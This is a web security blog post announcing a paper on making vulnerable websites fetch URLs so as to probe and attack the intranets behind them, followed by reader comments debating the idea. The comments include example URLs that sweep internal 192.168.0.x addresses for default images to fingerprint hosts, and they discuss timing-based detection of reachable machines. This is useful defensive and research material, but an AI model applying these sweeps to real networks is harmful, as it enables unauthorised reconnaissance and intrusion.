Cenzic 232 Patent
Paid Advertising
web application security lab

Paper on Hacking Intranets Using Websites (Not Web Browsers)

This paper is a long time in coming, and I apologize for not getting it out sooner, but I’ve been very swamped. We all have known for a long time that we can force websites like Google to perform attacks on our behalf by getting them to surf random websites and perform RFI attacks, for instance. That’s bad. But what if we were to turn the concept around and instead use it to hack intranets? Herein lies the basis for intranet hacking using websites. I threw the paper up on SecTheory for anyone who wants to read it.

If you recall all our intranet-hacking-with-browsers conversations over the last two years, this will look really familiar, because it’s using all the same tactics, except instead it’s the webserver doing the attacking, rather than the web-browser. The paper draws on techniques and tactics we’ve all know and love so there shouldn’t be anything surprising in here. So the next question is how prevalent is this stuff? Well, I’ve seen it exactly one time. But I’ve only tried it a handful, so it’s really hard for me to estimate how often it happens. My guess is that it is somewhat rare, but using Google dorks to identify potentially vulnerable sites would prove to speed up non targeted attacks. Kinda nasty.

21 Responses to “Paper on Hacking Intranets Using Websites (Not Web Browsers)”

  1. Chad Grant Says:

    Appears to be some typo’s in those IP’s, not sure if that was on purpose

  2. DoctorDan Says:

    Good read! This concept is certainly something to consider, yet often looked-over. I’ll be looking into this more for sure. I expect we will be hearing of such attacks more commonly in the near future. Pretty scary, actually. It’s time to turn the LAMP on and experiment =D

    Thanks!
    -Dan

  3. kuza55 Says:

    I’ve played around with similar ideas against proxies, but I’ve never thought of applying it to web servers, thanks for the paper/idea, :D

    Though personally I would have thought most boxes would be firewalled to not allow traffic to anywhere other than the database, since you generally don’t want them connecting back out, but I guess that’s really unacceptable in some cases.

    Anyway, have you seen any applications of this in the wild (i.e. companies running software which allows GET requests), and if so what kind of software was it, forum software, wiki software….?

  4. kuza55 Says:

    Also, on a similar note, have you by any chance seen misconfigured reverse proxies setup, where you are able to get access to unhardened development machines because the reverse proxy was not setup to only allow access to public websites?

  5. drear Says:

    I must say that this paper was a disappointment to me.

    Quoting RSnake: “If you recall all our intranet-hacking-with-browsers conversations over the last two years, this will look really familiar, because it’s using all the same tactics, except instead it’s the webserver doing the attacking, rather than the web-browser”, — and therefore it hardly reveals anything new.

    Can one really unwrap something new by replacing few addresses? And since when the concepts surrounding DMZs were new? Back in 1994? And the paper makes far too many assumptions; and every single conclusion could be countermeasured by the standard ingress/egress filtering at the layers well below 7.

  6. Schmoilito Says:

    In my former life as a support engineer for reverse proxy/WAF, I’ve seen and fixed quite a few mis-configurations that would lead to such vulnerabilities. So I don’t doubt that they exist in the wild.

  7. RSnake Says:

    @chad - whoops, global search and replace gone wild. Thanks, I fixed that!

    @kuza55 - I have encountered a few messed up proxies, but I find a lot less companies use them that I would have originally thought. Probably because there are many other ways to do most of what a proxy provides. I bet you the scanner guys could give you more information there though. They see a lot more of that kind of stuff than I would.

    @drear - sorry you didn’t see much new there - it was just a complicated thing to explain, which is why it needed a paper instead of a blog post. You’re right there is not a whole lot that is new there, although I’ve never heard anyone talk about it before. But I assure you that I have seen this attack work in the wild. And to answer your last question, yes, a properly configured network would solve all of this. It just so happens that lots of networks are improperly configured (see Schmoilito’s comment). Same is true with almost any vulnerability though - if you built it correctly there wouldn’t be an issue (it’s kind of a ridiculous thing to say though).

  8. hackathology Says:

    I like this article but there are a few typo mistakes. However that is minor stuff. The thing is Rsnake should not confuse users with internal and external IPs with both addressess starting with 192. An external IP start with 193. Also, i don’t quite understand the whole imaging part. The concept is there, but i still don’t get the default picture on the imaging part. Overall this article is not badly written, at least there was an effort.

  9. RSnake Says:

    I’m not sure what you’re saying, hackathology - all IPs mentioned in this article were supposed to be internal, there’s no external addresses other than the attackers and whatever www.company.com resolves to. What don’t you get about the diagram? Just to be clear, this isn’t about users accidentally hacking themselves, this is about a website leaving a hole that can be used to hack other machines behind it’s firewall.

  10. DoctorDan Says:

    @RSnake, I think hackathology was referring to the default image example which reveals the intranet to the attacker. I don’t think he means the diagram.

    I’m still somewhat stumped as to how the intranet is connected to and port swept.

    -Dan

  11. RSnake Says:

    Maybe this image will make it more clear… Take a look: http://www.sectheory.com/static/images/upload.png

    You use the server to connect for you. Port sweeping may not work, unless it’s only port 80 you are connecting to, because most of the time these types of programs don’t have great error messages. Although Jeremiah did mention you may be able to do something tricky like use timing attacks - which has the side effect of not being restricted by egress filtering if all you are after is the IP space they are in.

  12. hackathology Says:

    Hi Rsnake, DoctorDan is right, what i meant was the default image example. The diagram itself is easy to understand. I just dun understand how default images lead to port sweep and fingerprinting.

  13. RSnake Says:

    Default images live on servers, in the case I gave I used a default Apache image. By scanning all of the IP range for that default image like so:

    http://192.168.0.1/path.to/defaultimage.jpg
    http://192.168.0.2/path.to/defaultimage.jpg
    http://192.168.0.3/path.to/defaultimage.jpg
    http://192.168.0.4/path.to/defaultimage.jpg

    You now know that it is running whatever that software is. The examples I gave were apache and Wordpress. Once you know a server is there (using default IIS or Apache images) you can narrow that down to default images of software packages residing on those hosts, like wordpress, mediawiki, or whatever. Understand?

  14. DoctorDan Says:

    Thanks a lot! I understand it now. An image is worth a thousand words of explanation, sometimes. I can see how this could readily become automated as well. Really, some dangerous stuff!

  15. Ronald Says:

    @RSnake
    Good job, looks slick and was a good read.

    @drear
    Every attack is known since the 1970’s, doesn’t mean you can’t make mashups. I never seen anything new on AppSec since let’s say 1996. Stuff got a name, yes. ;)

  16. kuza55 Says:

    @RSnake:
    Would it also work to just request http://192.168.0.1/ instead of the image, and try to differentiate between host not reachable, and a non-image file returned?

    If they only returned a generic “error occured” message, would timing attacks be relevant, because iirc sockets take a while to timeout, and things on the local net should respond very quickly - there might be issues with how long your packet takes to get there, but I’m sure you could get a baseline setup easily by, e.g. getting it to make a request to itself for a non-image file (i.e. http://127.0.0.1/) to check how long it takes for your request to get there plus how long it takes to verify whether its an image or not, and then assume that if it takes too much longer, then its probably not reachable. But that’s just a guess, and I don’t have the lab to test it….

  17. hackathology Says:

    understood now. Thanks Rsnake.

  18. RSnake Says:

    @kuza55 - I think that totally depends on the implementation of the software on the web server. Some may have totally different results than others, but thankfully there’s an easy way to check. Have it connect out to the web for servers that are there or aren’t there, and see how long it takes and what the error messages look like. I bet there are some that will respond differently depending on the situation (three states instead of two):

    1) found the image
    2) found something that’s not an image
    3) cannot connect to the URL in question

    That would definitely make things easier than:

    1) found the image
    2) sorry, didn’t work

    In that case, timing attacks now become more relevant, and I think you could make a case for it.

  19. Michael Says:

    Hey FYI, McAfee site advisor just popped up for me, link below:
    http://www.siteadvisor.com/sites/ckers.org?aff_id=105-74&suite=true&premium=false&client_ver=ie_2.4.6066.0&client_type=IEPlugin

  20. drear Says:

    @RSnake: well, perhaps I was more disappointed with the paper itself rather than necessary the concepts, which, if we assume a badly configured network, are there. Still, the paper could have covered the topic better since in a way it multiplies the risk factor, given that, as usual, when one host collapses, the rest soon follow.

    @Ronald: ditto, and well, the fundamental issues we are dealing here were actually new few years back or so, at least to the masess.

    If we are really dealing with a network that has the need to spawn HTTP requests to multiple servers, it would be reasonable, perhaps, to assume something like FastCGI to begin with. So think of the common setup in which usually Apache is the mere front end and everything else is handled by something else, possibly somewhere else. Having a server on the localhost hardly changes anything, but would the timings still make sense if the FastCGI or related rails application on the localhost is the one that spawns everything to the internal network? I guess so.

  21. RSnake Says:

    @drear - I’m still not sure I understand your complaint. You didn’t like the paper because I didn’t completely discuss why it’s bad to have a mis configured network? You yourself pointed out that that part of the problem has been known since 1994 and isn’t worth discussing. Am I just not understanding what you’re saying? I’d happily clarify whatever it is you think is missing from the paper, if I could figure out what it is you didn’t like.